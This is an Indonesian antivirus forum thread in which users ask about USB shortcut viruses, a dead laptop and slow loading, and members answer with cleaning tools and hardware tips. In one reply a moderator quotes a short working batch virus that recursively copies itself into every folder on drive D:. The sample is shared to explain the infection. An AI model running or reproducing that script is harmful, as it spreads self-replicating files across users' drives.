Penulis Topik: Bedah Virus Disini !  (Dibaca 278844 kali)

Offline renno

  • Pro200
  • *****
  • Tulisan: 217
  • Reputation: 248
  • Jenis kelamin: Pria
    • Lihat Profil
    • Kompas Antivirus
Re: Bedah Virus Disini !
« Jawab #240 pada: Juni 28, 2014, 05:25:52 PM »
Pagi gan, newbie nih.:D
saya mau konsultasi. saya punya virus New Heur.FFD(Link) dan New Heur Hidden Root. setiapa saya nyolokin flashdisk, mmc, selalu muncul dan di dalam flashdisk ada tulisan "shorcut 4GB". solusi nya gimana ya gan?

Itu Virus gamarue, bisa dibersihkan dengan PCMAV 9.9.3 update build5. Jika tidak terdeteksi, bisa gunakan KompasAV 3.0.5 lalu update online.

http://virusindonesia.com/2013/08/27/gamarue-cara-unik-menyembunyikan-file-di-flashdisk/
Download


Like Fanpage

Offline melody

  • Pro10
  • ***
  • Tulisan: 10
  • Reputation: 40
    • Lihat Profil
Re: Bedah Virus Disini !
« Jawab #241 pada: September 08, 2014, 02:51:28 PM »
oh kaya gitu yah ... hihi baru nyadar dan baru tahu... ohiya kak, kalo itu muncul lagi dan lagi karena apa yah?? smadav aku nya kurang update kali yah??

Offline 3ndiixz

  • MoMod
  • Pro500
  • *****
  • Tulisan: 928
  • Reputation: 742
  • Jenis kelamin: Pria
  • .:: DOCTOR PENDIK ::.
    • Lihat Profil
    • Install Ulang Windows Modif XP, 7, 8.1, 10 Mojokerto
Re: Bedah Virus Disini !
« Jawab #242 pada: September 10, 2014, 10:53:35 PM »
virus bat yg mengkopikan diri ke semua folder
Kutip
set h=For

%h% /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat"
::: :x :x :x S.M.A.D.Δ.V [[Δ۞Δ۞Δ]] AV LOKAL :x :x :x :::
                    GO INTERNASIONAL

Offline matlexaw

  • Pro10
  • ***
  • Tulisan: 71
  • Reputation: 87
  • Jenis kelamin: Pria
    • Lihat Profil
    • Rumah dijual
Re: Bedah Virus Disini !
« Jawab #243 pada: September 22, 2014, 10:15:04 AM »
moga ane ga kena virus gituan
Cari rumah dijual terlengkap dari seluruh Indonesia: http://www.propertykita.com/

Offline Piscine

  • Pro3
  • **
  • Tulisan: 7
  • Reputation: 37
    • Lihat Profil
Re: Bedah Virus Disini !
« Jawab #244 pada: Oktober 01, 2014, 04:24:13 PM »
virus apa aja sih yang ga kedetek sama smadav?

Offline klikdisumber

  • Pro3
  • **
  • Tulisan: 7
  • Reputation: 36
    • Lihat Profil
    • Poker Domino Online Indonesia
Re: Bedah Virus Disini !
« Jawab #245 pada: Januari 22, 2015, 01:44:13 PM »
Gan mau tanya dong,komputer ane mati total setelah di install ulang,apa itu karena virus y?,skrng engga ane perbaikin krn uda tua juga laptoponya ^_^

Offline Manggolo

  • MoMod
  • Pro500
  • *****
  • Tulisan: 715
  • Reputation: 623
  • The other side of me
    • Lihat Profil
Re: Bedah Virus Disini !
« Jawab #246 pada: Januari 22, 2015, 05:09:02 PM »
Gan mau tanya dong,komputer ane mati total setelah di install ulang,apa itu karena virus y?,skrng engga ane perbaikin krn uda tua juga laptoponya ^_^
mati total , kerusakan harware .
dicoba lepas batre dan carger . tekan tombol power +- 20 detik .
lepas ram dan coba hidupkan kembali dengan carger saja

Offline dewakontesseo

  • Pro1
  • *
  • Tulisan: 1
  • Reputation: 31
    • Lihat Profil
Re: Bedah Virus Disini !
« Jawab #247 pada: Pebruari 12, 2016, 06:15:48 PM »
Agan-agan, saya mau tanya ni, Laptop saya sering loadingnya lama dan kursornya itu berputar-putar yang akibatnya tidak bisa lagi dioperasikan, setiap kambuh penyakitnya itu memakan waktu 1 jam. Pertanyaanya : Apa ya penyebabnya itu dan bagaimana cara mengatasinya? Terima Kasih.




visit my blog: http://dewakontesseo.web.id/ dan http://www.sumateraseo.web.id/